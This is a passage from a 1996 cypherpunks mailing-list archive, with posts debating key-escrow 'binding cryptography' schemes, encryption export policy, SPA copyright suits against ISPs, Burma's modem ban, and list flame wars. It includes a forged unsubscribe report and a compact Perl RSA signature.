record' is the person you are communicating with.  (In the context of
a voluntary system, with this as a stated contractual or participatory
mutual agreement).

> Also, "random padding" information of the second recipient is very
> secret as well, just compare the results Don Coppersmith presented
> on Eurocrypt97: if you know the enough padding you know it all. So
> for instance sending along the padding info along will make any
> key-escrow superflous (-;

The padding was to be encrypted for the primary recipient along with
the message, not in the clear.  The primary recipient can already
decrypt, so having the padding adds nothing for him.

I suggested this in response to someone discussing feasibility of
software key escrow for Clipper II.  Clipper II had requirements that
the software not interoperate without modification with non-escrowed
versions.  This fulfills that requirement.

Another comment on your proposal is that although it allows anyone to
verify, it is not generally the case that anyone (other than the
recipient) is in a position to verify.  In many jurisdictions it is
illegal to intercept other peoples email.

> >As GAK is (stated to be) voluntary, surely the only person who has any
> >business knowing whether the message is honestly GAKked is the
> >recipient.  After all you can double encrypt or not use GAK at your
> >option, so this seems to lose nothing for the GAKkers.
> >
> >The description of the paper also says nothing about trust worthiness
> >of the TTPs, from the public's perspective.
>
> As far as we are concerned, anybody - willing to follow regulating -
> can set up his own TRP.

You suggested that even if the system was voluntary, and anyone could
become a TRP, governments would have regulations granting only those
they deemed suitable the right to operate a TRP!

If this is voluntary, truly, I don't see the need for government
regulation.  Surely I personally can start a TRP, and ignore the
governemnt regulations, GAK is voluntary right, and my system isn't
GAK, this is a private contract between me and my clients, not a
government approved TRP.  Can I operate non government approved TRPs?
(I'm having a hard time thinking of any individuals who would use it
even if I did!)

> > (Not that I,
> >or anyone else would want to use GAK still, but it would be a gesture
> >of good will on the part of the GAKkers, and would show intentions not
> >to misuse the system.  I suggest that they would never agree to such a
> >system because their stated aims are untrue: they *do* want to outlaw
> >non-escrowed encryption for domestic US traffic, and they *do* want to
> >decrypt without warrants, and without public audit.  Export control
> >and temporarily `voluntary' GAK is a means, not an end.)

> Who is they, governments as a whole? If you simplify discussions in
> this way, I might as well say: "you guys only want to help
> criminals". I understand your fears, but don't exaggerate.

The US government at least, has demonstrated all of the above.

I don't trust governments, because governments have repeatedly
demonstrated that they are not trustworthy.  I live in the UK,
mistrust of government is not a US only thing.

Adam
--
#!/bin/perl -sisN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsjxII*op"
$/=unpack('H*',<>);print pack('C*',split('\D+',`echo 16i\U$k"SK$/SM$n\E$^I|dc`))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 11 Oct 1996 10:18:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: JoC Nox GAK
Message-ID: <1.5.4.16.19961011171637.2a77d966@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Journal of Commerce, October 10, 1996.


Editorial/ Encryption Technology Policy 


Oct. 10 -- SECRET CODES: Let's say you're selling your house and, 
after months of searching, you've found a potential buyer. But 
there's a problem: The local sheriff wants a spare set of keys in
case the house is used for unlawful purposes. Your buyer, a solid
citizen, doesn't want his privacy invaded. He decides to look in 
another neighborhood, with a less intrusive sheriff.


This improbable scenario describes, more or less, Washington's 
policy toward U.S. exports of encryption technology -- devices 
that scramble computerized data. Under a revised policy, the 
Clinton administration says that, following a partial two-year 
grace period, it will require exporters of sophisticated 
encryption devices to keep a spare set of "keys" -- the 
formulas that turn encrypted data back into plain text -- in a 
place accessible to the government. That may seem like a sensible
precaution, but it is likely to hurt exporters while doing little 
for law enforcement. The government's effort to control encryption 
goes to the heart of the information networks that are becoming a 
bigger part of people's lives almost by the day. Individuals and 
companies leave behind them an ever-broadening wake of electronic 
records -- on everything from video rentals and catalog sales to
car registrations and health records. As hackers get better at 
breaking into these files, it becomes more urgent to use 
encryption to protect them.


The government, however, has other ideas. It says encryption sold 
overseas poses a threat because law enforcement officials may not 
be able to decode the secret communications of terrorists and
drug dealers. To ease its access to such files, the government 
essentially is building a trap door into billions of records 
stored in computers overseas.


Of course, there are caveats and loopholes. The policy applies 
only to foreign sales; U.S. law forbids government prying into 
domestic computer files. Also, the policy grants exporters a 
two-year period in which they can sell encryption up to a 
moderate level of sophistication -- 56 bits in key length --
without restriction. After that, a key-access requirement would 
take effect.


The government-access rule will force U.S. exporters to do some 
fancy sales footwork. Foreign buyers, after all, may not be 
thrilled to know Uncle Sam can gain access to their private 
files. They may worry that if Washington has keys, their own 
governments may demand the same, and that the strangers holding 
the keys may not guard them carefully, no matter what the rules 
say.


Terrorists, meanwhile, will have plenty of ways to circumvent 
the U.S. rules. They have a choice of 179 foreign-made encryption 
devices of at least 56-bit strength that are not burdened by 
key-access requirements. Terrorists also could make their own 
scrambling devices -- there are books available on how to write 
encryption codes -- or buy them in the United States, which has 
no domestic sales restrictions, and carry them out of the 
country. Why, then, is Washington bothering with export 
controls? In part, it's an attempt at back-door control of the 
domestic market. If companies are forced to limit the 
sophistication of encryption destined for export markets they 
may do the same for domestic products, to cut production costs. 
That would make life easier for law enforcement officials, 
who worry increasingly about impenetrable barriers to suspected 
criminals' computerized information.Those agencies indeed have 
a problem. Technology has given the world's bad actors a better 
cover of secrecy than ever before. But trying to control exports 
and limit domestic technology is not the solution. As a 
practical matter, the encryption horse has long since departed 
the law enforcement barn.


Absent an agreement among all nations on a key access system -- 
an impossible goal and not a very desirable one, given different 
countries' views on protecting privacy -- unilateral restrictions 
will be futile. They will serve mainly to scare customers away 
from U.S. manufacturers. Rather than try to restrict the 
encryption industry, the administration should promote it, and 
find other ways to improve criminal surveillance.

-----

On the Internet:

Visit The Journal of Commerce on the World Wide Web. Point your 
browser to: http://www.joc.com/

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Fri, 11 Oct 1996 05:23:55 -0700 (PDT)
To: everheul@NGI.NL
Subject: Binding cryptography - much work, little point ?
Message-ID: <9610111223.AA02697@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




Eric_Verheul writes:

> In our scheme any third party, which is probably never a TRP, can check
> equality of the sessionkeys send to the primary recipient (the TRP) and
> the second recipient (the real adressee), i.e. *without* needing secret

So could anyone anyway by asking the TRP.  The TRP returns a Yes/No
answer, withou disclosing the session key.  Is your binding scheme motivated mainly
by avoiding that workload on the TRP ?  Or by the fact that everybody might
prefer a different TRP ?

I suspect the scheme is incomplete anyway.  After skimming the web page I
see that the aim is to show the same session key has been encrypted under
different ElGamal pubkeys.  Now who's to say those pubkeys belong to anyone ?
Or is this what is meant by "such as Margaret's identity" ?  You'd list the
ids of the TRPs and also prove that the pubkeys used were theirs ....  ?


Now to the politics...

E__Allen_Smith writes:

> Quite simply, you've invented a system that makes censorship more
> possible. As a scientist, I try to avoid areas that have such negative
> effects

The usual Big Problems for GAK 

  1)  What's in it for the user ?
  2)  What happens when the Feds recover meaningless data ?

2 does not seem to be addressed except by proposing restrictions
which Eric dismisses as follows:

Adam Back:
    >system because their stated aims are untrue: they *do* want to outlaw
    >non-escrowed encryption for domestic US traffic, and they *do* want to


Eric Verheul:
    > Who is they, governments as a whole? If you simplify discussions in this
    > way, I might as well say: "you guys only want to help criminals". I understand
    > your fears, but don't exaggerate.


 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 11 Oct 1996 11:03:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SPA Press Release on ISP suits
Message-ID: <v03007833ae843c15bf0b@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Mime-Version: 1.0
Date:         Fri, 11 Oct 1996 12:36:55 -0400
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Michael Dodson <dodsonm@WANE-LEON-MAIL.SCRI.FSU.EDU>
Subject:      SPA Press Release on ISP suits
To: CYBERIA-L@LISTSERV.AOL.COM

The formatting may be a bit rough.  I am not a pro at this.


FOR IMMEDIATE RELEASE  ((edited))

Contact: David Phelps, (202) 452-1600, ext. 320, dphelps@spa.org

SPA Files Copyright Suits Against ISPs and End Users

Internet Anti-Piracy Campaign Launched

(Oct.10, 1996 --Washington, D.C.) -- The Software Publishers Association
(SPA) announced today that it has filed five civil lawsuits for copyright
infringement occurring on the Internet. Three of the lawsuits were filed
against Internet service providers (ISPs), and the remaining two were filed
against individual end users. Additionally, SPA launched its Internet
Anti-Piracy Campaign, which includes education and enforcement components,
in an effort to educate and work cooperatively with ISPs regarding
copyright infringement.

ISP lawsuits were filed on Oct. 7 and 8 against Community ConneXion of
Oakland, Calif.; GeoCities of Beverly Hills, Calif.; and Tripod Inc. of
Williamstown, Mass. The SPA members named as plaintiffs in all three suits
were Adobe Systems Inc., Claris Corp. and Traveling Software Inc. In each
case, SPA first contacted the ISP and requested that the infringing
material be removed, but the ISP failed to respond and cooperate.

SPA also filed suit against Jeffrey Workman of Auburn, W. V., and Patricia
Kropff of Scottsdale, Pa, on behalf of Adobe Systems Inc., Claris Corp.,
Corel Corp., Datastorm Technologies Inc. and Novell, Inc. In each of these
instances, SPA received reports of alleged copyright infringement on
certain Web sites, and with the assistance of the ISPs, tracked the
individuals responsible for posting the infringing material.

"These lawsuits send a clear signal to ISPs and end users that neither
direct nor contributory copyright infringement will be tolerated. The
Internet does not provide a safe haven for these types of activities," said
Ken Wasch, SPA president.

SPA's Internet Anti-Piracy Campaign (IAPC), which is outlined at
http://www.spa.org/piracy/iapc.htm, contains information explaining why
ISPs may be liable for copyright infringement, the risks involved and seven
warning signs that infringing activity may be taking place on the ISP's
server. Additionally, ISPs may sign an ISP Code of Conduct to show they
have adopted the operating practices encouraged under the copyright law.

Upon receiving a report of alleged copyright infringement on the Internet,
SPA confirms the unlawful activity and sends a letter to the ISP servicing
the infringing user. In most cases, the ISP cooperates and remedies the
situation. If the infringing user can be identified -- as alleged in the
Workman and Kropff cases -- SPA may then choose to seek action against the
end user. If the ISP is unwilling to stop the unlawful activity, SPA may
choose to file suit against the ISP.

"Our intentions are to work cooperatively with ISPs. A key element of the
IAPC is the ISP Education Program devoted to alerting ISPs to their
potential liability and providing them with the tools and guidance to
protect themselves," said Joshua Bauchner, SPA's Litigation Coordinator.

"The IAPC maintains SPA's traditional balance between education and
enforcement. We first make contact in an effort to amicably resolve the
matter, and only when absolutely necessary do we turn to litigation."

An integral part of the cooperative effort between SPA and ISPs is the ISP
Code of Conduct. This simple agreement asks that ISPs protect themselves
from liability by stopping pirate activity on their systems. In return, SPA
will attempt to contact the ISP if it receives a piracy report concerning
it -- before initiating other action.

((end of edited release))

See http://www.computerworld.com/news/news_articles/961010spa.html
for early reactions.


Michael Dodson
dodsonm@wane-leon-mail.scri.fsu.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 11 Oct 1996 11:03:50 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Tim May is a fine person.
In-Reply-To: <sV8LVD10w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961011140324.3313E-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Timmy May once again praised himself "anonymously":
> 
> anonymous@miron.vip.best.com writes:
> 
> > Tim May's support of cryptography is an example of his
> > typically irreproachable behavior and exquisite maners
> > and above all his superior consideration. Indeed, Tim May
> > is a lord amoung lords, the most illustrious of them all.
> 
> How pathetic. Clearly, no person is willing to put their name on
> a statement supporting this flamer and spammer, totally ignorant
> of cryptgraphy, and widely disrespected by his colleagues.

Ok, fine have it your way.  While, I didn't write the above, however I
agree with it. 

Tim IS a fine person and an excellent cypherpunk.  There, now you have 
ONE person willing to post his name and say Tim is cool.  Happy?

And while we're at it, you are amoeba shit. :)  And I don't hide behind a 
'nym unlike the poster of the above.  So did you get your jollies now?  
did you finnally get your rocks off now that someone publically supported 
Tim?

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 11 Oct 1996 14:02:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SPA sues C2, other ISPs and users
Message-ID: <3.0b28.32.19961011141214.006e8aec@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



According to a 10/10/96 press release, the Software Publishers Association
has files copyright infringement suits against three ISP's and two
individual users. The three ISP's were Community Connexion of Oakland,
GeoCities of Beverly Hills, and Tripod of Williamstown, Mass. The two users
sued were apparently customers of other ISP's who turned over their names &
contact information to the SPA.

The press release, located at
<http://www.spa.org/piracy/releases/netpir.htm>, indicates:

"Piracy has taken many forms on the Internet. These include making
unauthorized copies of software available for download, the posting of
serial numbers, cracker and hacker utilities and links to pirate FTP sites.
Although many believe piracy is limited to "warez" or illegal copies of
software, it extends beyond that narrow definition. Under the law, anyone
who knows -- or should have known -- of the infringement and who
assists, encourages or induces the infringement is liable for indirect
infringement. In each of the actions SPA filed, at least two of the above
infringements were present. "

The SPA has apparently adopted two relatively aggressive litigation
strategies - putting ISP's in the position of disclosing otherwise
confidential customer information or being sued themselves, and treating
peripheral data about copyrighted works like copyrighted works themselves
(e.g., serial numbers). Particularly interesting is that they seem to be
claiming that a *link* to a pirate FTP site is itself infringing
(potentially contributory infringement).

(My comments above are made solely from reading the press release.)

It's inappropriate to expect Sameer or any other C2
employee/agent/representative to discuss the suit before they've had a
chance to find and meet with an attorney; in some circumstances it might
never be prudent for them to make a public statement about the suit. But it
certainly couldn't hurt for people who've thought about signing up with C2
to do so now as a show of support, nor for existing users to renew their
service early.

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Fri, 11 Oct 1996 14:11:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Burma bans modems
Message-ID: <19961011211025088.AAA101@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: George Sadowsky <George.Sadowsky@nyu.edu>
    Subject: Re: Burma Bans modems
    Here is the text of the web page referenced below:

    RANGOON, BURMA, 1996 SEP 27 (NB) -- Burma has made owning, using,
    importing or borrowing a modem or fax machine without government
    permission a crime, punishable by up to 15 years in jail, according
    to a report by United Press International.

    Burma's military government has imposed what's called "The Computer
    Science Development Law" which empowers the Ministry of
    Communications, Posts and Telegraphs to specify what exactly can be
    restricted, UPI reports.

    UPI quotes the government-run newspaper New Light of Myanmar as
    saying the same punishment is prescribed for anyone who sets up a
    link with a computer network without the prior permission of the
    ministry, or who uses computer network and information technology
    "for undermining state security, law and order, national unity,
    national economy and national culture, or who obtains or transmits
    state secrets."

    UPI reports that in July a diplomat, Leo Nichols, died in prison
    after he was sentenced to a lengthy term for illegal possession of
    fax machines.

    It's clear from this action that the SLORC, i.e. the "State Law and
    Order Restoration Committee" (sic!) understands full well the
    benefits and importance of the Internet and other forms of
    electronic communication to open societies, and is determined to
    deny these benefits to its citizens.  Given its recent history and
    the quasi-imprisonment of Daw Aung San Suu Kyi, this new action is
    perfectly consistent with the government's previous abysmal
    record.

    Countries who would deny open Internet access to its citizens might
    well pause to consider if they wish to be associated with the
    current government of Myanmar in doing so.


    George Sadowsky, Director                     Voice: +1.212.998.3040
    Academic Computing Facility                     Fax: +1.212.995.4120
    New York University
    251 Mercer Street                             George.Sadowsky@nyu.edu
    New York, New York  10012-1185 http://www.nyu.edu/acf/staff/sadowsky/


--j

You can retrieve my PGP public key by sending mail with subject "send pgp key".
Take a look at www.Program.com for a good programmer web site.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 11 Oct 1996 14:20:24 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Kantor on GAK
In-Reply-To: <v03007800ae8433cf4e0a@[207.167.93.63]>
Message-ID: <Pine.3.89.9610111458.A19095-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 11 Oct 1996, Timothy C. May wrote:

> At 8:29 AM -0400 10/11/96, John Young wrote:
> >   You assume that foreign buyers would not buy key-recovery
> >   products, but you ignore the trend -- especially in Europe
> >   -- to require use of key-recovery products and bar the
> >   import of stronger and stronger encryption products that do
> >   not take law enforcement into account.
> 
> So, because some countries will not allow import into _their_ countries of
> non-GAK software, this means GAK must be mandated on U.S. _exports_? Since
> when it is our responsibilty to enforce other nation's import laws?
> (Because Iran will not allow the import of blasphemous literature, should
> the USG ban all export of such material from the U.S.?)

Note that Mickey Kantor is doing _exactly_ what has been predicted on 
this very list: he is using the (very limited) response the US received 
from other countries by strongarming said countries into supporting a 
pro-GAK position to manipulate the American public into accepting GAK by 
pretending the US must respond to the requests of the world market.

--Lucky, who hopes everybody on this list will vote for Harry Browne.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 11 Oct 1996 14:43:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Forged "unsubscribe"
Message-ID: <v03007800ae847e9144ef@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Though I am avoiding commenting on the continuing Vulis nonsense, something
has come up which necessitates my comment.

I received a message from majordomotoad.com saying that my
(alleged/purported) message, "unsubscribe cypherpunks dlv@bwalk.dm.com", is
being forwarded for processing. The full message is included below.

It appears that someone is attempting to make it look like I am trying to
unsubscribe Dmitri Vulis! I assure you all that I have sent no such message
to majordomo@toad.com.

I'm cc:ing Hugh Daniel to make sure he sees this. Perhaps he can look at
the full headers and path information of the alleged message from me and
figure out who is playing this kind of game.

--Tim May


>Received: from you for tcmay
> with Cubic Circle's cucipop (v1.10 1996/09/06) Fri Oct 11 14:26:44 1996
>X-From_: Majordomo-Owner@toad.com Fri Oct 11 13:46:54 1996
>Received: from toad.com (toad.com [140.174.2.1]) by you (8.7.6/8.7.3) with
>ESMTP id NAA13723 for <tcmay@got.net>; Fri, 11 Oct 1996 13:46:54 -0700
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id NAA00496;
>Fri, 11 Oct 1996 13:53:05 -0700 (PDT)
>Date: Fri, 11 Oct 1996 13:53:05 -0700 (PDT)
>Message-Id: <199610112053.NAA00496@toad.com>
>To: tcmay@got.net
>From: Majordomo@toad.com
>Subject: Your Majordomo request results: unsubscribe
>Reply-To: Majordomo@toad.com
>
>--
>
>Your request of Majordomo was:
>>>>> unsubscribe cypherpunks dlv@bwalk.dm.com
>Your request to Majordomo@toad.com:
>
>	unsubscribe cypherpunks dlv@bwalk.dm.com
>
>has been forwarded to the owner of the "cypherpunks" list for approval.
>This could be for any of several reasons:
>
>    You might have asked to subscribe to a "closed" list, where all new
>	additions must be approved by the list owner.
>
>    You might have asked to subscribe or unsubscribe an address other than
>	the one that appears in the headers of your mail message.
>
>When the list owner approves your request, you will be notified.
>
>If you have any questions about the policy of the list owner, please
>contact "cypherpunks-approval@toad.com".
>
>
>Thanks!
>
>Majordomo@toad.com
>
>
>

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 11 Oct 1996 13:59:54 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Margaret Milner Richardson loses her breakfast...
In-Reply-To: <v03007802ae79fed8a057@[206.119.69.46]>
Message-ID: <Pine.SUN.3.91.961011170039.3313M-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Oct 1996, Robert Hettinga wrote:

> >From the Wall Street Journal Wednesday October 2, Page 1:
> 
> Use of the internet to attract tax-dodgers rings alarm bells at the IRS.

Shh, be vewy vewy quiet, I've got a guy subscribing to my filtered list 
from the IRS. :)  (I'm not forwarding tax evasion stuff since it's not 
cpunx related, but still...)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 11 Oct 1996 14:04:56 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: EUB bank on PRI "Marketplace" tonight
Message-ID: <199610112105.RAA23396@nrk.com>
MIME-Version: 1.0
Content-Type: text


Heard a teaser that EUBank will be mentioned on Public Radio Intl's
Marketplace tonight.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Fri, 11 Oct 1996 15:15:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <yqXmVD1w165w@bwalk.dm.com>
Message-ID: <Pine.BSI.3.91.961011170759.18216A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> > It would make a nice change from your one-sided rants to the list, and 
> > would probably be a lot more civil, too.
> 
> Zach, I don't think you've been on this list long enough to realize that
> Timmy started flaming me for no apparent reason, and lying about me, and
> attributing to me various shit I never said. I'm just pointing out that
> he's a liar and a generally despicable net.scum.

    I've been on this list for around a year, and nothing that I've 
seen (on here) has given you enough reason for the type of senseless 
garbage flowing freely from your fingers.  While Tim (along with the 
rest of us) is no angel your problems with him should be sent directly
to him and not the Cypherpunks list where it appears to the rest of us 
that you are having a one-sided, drug-induced ranting fest.

    I simply can't comprehend why someone with your alleged credentials 
and knowledge would want to make their peers see them as a foul-mouthed, 
ignorant teenager.  So, explain yourself.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      "We don't want to get our butts kicked by a bunch of long-haired 
        26-year-olds with earrings." -- General John Sheehan on their 
                       reasons for InfoWar involvement





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apteryx@super.zippo.com (Mark Heaney)
Date: Fri, 11 Oct 1996 13:53:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Why not PGP?
Message-ID: <3267823e.85486825@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Ray wrote:

>Rollo Silver wrote:

[snip]

>> 2. Suppose someone writes a program Z that has no expicit crypto code in
>> it, but has hooks for installing one or another version of PGP. Given a
>> copy of Z, someone in this country could install PGP he got from MIT,
>> whereas someone in Europe could install the international version.
>> Would export of Z violate ITAR restrictions?
>
>Yes.
>JMR

Does this mean that exporting Private Idaho, PGPfront, WinPGP, etc. would
be a violation of ITAR because they function only when combined with PGP
and contain "hooks" for using PGP?

I don't recall any restrictions on who could download these files from
their host sites.

Mark

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMl6ZSN36bir1/qfZAQGUWAMAmbh59CK2wMBt/AVCEcwoiknVgIYMNRmS
B2s4YJyvq5QQnUkynUcMSU17vltRhwQyapz22lg4rZZxYIoEC0P3vVDkH3mPCnnE
qPSMtwtV+o1//cOQHjD7VfjeScO69R7u
=Np5A
-----END PGP SIGNATURE-----

-----------------------------------------------------------------
Mark Heaney    finger snipe@starburst.cbl.cees.edu for public key
PGP Fingerprint= BB D8 9B 07 51 87 05 AC  47 7B F2 4F A6 AB 1A CD   
-----------------------------------------------------------------
You keep using that word, I dunna think it means what you think it means.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 11 Oct 1996 13:48:00 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: (2) LET'S MEET DIMITRI
In-Reply-To: <Pine.SUN.3.91.961010143953.7428A-100000@crl.crl.com>
Message-ID: <199610112056.OAA06271@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.961010143953.7428A-100000@crl.crl.com>, on 10/10/96 
   at 02:40 PM, Sandy Sandfort <sandfort@crl.com> said:
-. attila sez:
-.
-.>     WOW!   Dimitri as the featured roast, Dean Martin style, would be    
-.> enough for me to seriously consider leaving my high desert Utah 
-.> safe house!  
-.
-.Will you pledge a few bucks, though?
-.
        after I figure out how to allocate the $400+ it takes to get 
    out of here --the disadvantage of living nowhere: $119 each way
    just to deal with SLC for transfer plus SLC to SFO/SJO

        it's too late in the year to even consider crossing the sierras
    on my chopper, ...other than airplane, the sole means of transport.
    
        sold my category D twin tprop since I do not have a valid 
    medical endorsement from the FAA  or the required certified 
    copilot for Cat II or IIIA landings if SFO is pure blind slop.  
    so, it's commerical time.

        so far, being in the high desert away from population in an
    enclave of 100 families as ornery as I, has been a blessing. 

        travel had become more than old.

        hopefully you can make this one hang together --particularly,
    if I can be the roastmaster --and choose the panel...  <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Fri, 11 Oct 1996 21:25:38 -0700 (PDT)
To: everheul@NGI.NL
Subject: Re: AW: Binding cryptography - a fraud-detectible alternative to key-esc
Message-ID: <199610120305.UAA05180@crypt>
MIME-Version: 1.0
Content-Type: text/plain


Another flaw with schemes of this time (in terms of failing to meet their
goals) is that they cannot detect superencryption and other forms of
non-standard encryption of the message body proper.  All they can really
do is verify from the outside that the same session key is encrypted for
the two recipients (the intended recipient and the Government Access to
Keys Party - let's not abuse the term by calling him a Trusted Third
Party).  But they can't be sure that the session key is sufficient
information to decrypt the message.

The session key could itself be a PK encrypted form of the actual
message session key, so that the true recipient would have to run the PK
decryption algorithm through two iterations before he actually got the
real message session key.  Or the message could be simply superencrypted
using a non-escrowed encryption system, then encrypted using the GAK
technique so that it looks fine from the outside.

These kind of techniques could be detected by the recipient, but as
Adam Back points out there are much simpler techniques if we just want
the recipient to be able to tell whether the key has been encrypted for
the GAKP.  For that matter if *he*'s really concerned about it he can
forward the plaintext to whatever governments he likes.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 11 Oct 1996 13:46:20 -0700 (PDT)
To: peter.allan@aeat.co.uk
Subject: Re: Binding cryptography - much work, little point ?
In-Reply-To: <9610111223.AA02697@clare.risley.aeat.co.uk>
Message-ID: <199610111911.UAA00320@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Allan <peter.allan@aeat.co.uk> writes:
> Eric_Verheul writes:
> 
> > In our scheme any third party, which is probably never a TRP, can check
> > equality of the sessionkeys send to the primary recipient (the TRP) and
> > the second recipient (the real adressee), i.e. *without* needing secret
> 
> So could anyone anyway by asking the TRP.  The TRP returns a Yes/No
> answer, without disclosing the session key.

Yes, but how would you know the TRP was telling the truth?  Also
asking the TRP is an online protocol with respect to the TRP.

> Is your binding scheme motivated mainly by avoiding that workload on
> the TRP ?  Or by the fact that everybody might prefer a different TRP ?

The paper suggests that in one plausible implementation, the checkers
referred to could be network service providers:

from the summary of the paper posted here:
: The idea is that any third party, e.g., a network or service provider,
                                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
: who has access to components 2, 3 and 4 (but not to any additional
: secret information) can: 
: a. check whether the session keys in components 2 and 3 coincide; 
: b. not determine any information on the actual session key.

This would allow for instance for a software only implementation of a
madatory key escrow system.  The government in question could then
deputize ISPs to do their mandatory GAK compliance checking for them.
(Deputizing companies is a recent trend in law enforcment techniques
anyway).

This would allow for instance IP level encryption, with non-conforming
encrypted packets being dropped by all ISPs in the country in
question.  Something the Singaporeans might find useful.  The checking
functionality could also be added to a key escrow enabled router.

For this kind of application, binding cryptography is spot on.

Adam

[disclaimer: I'm against GAK]
--
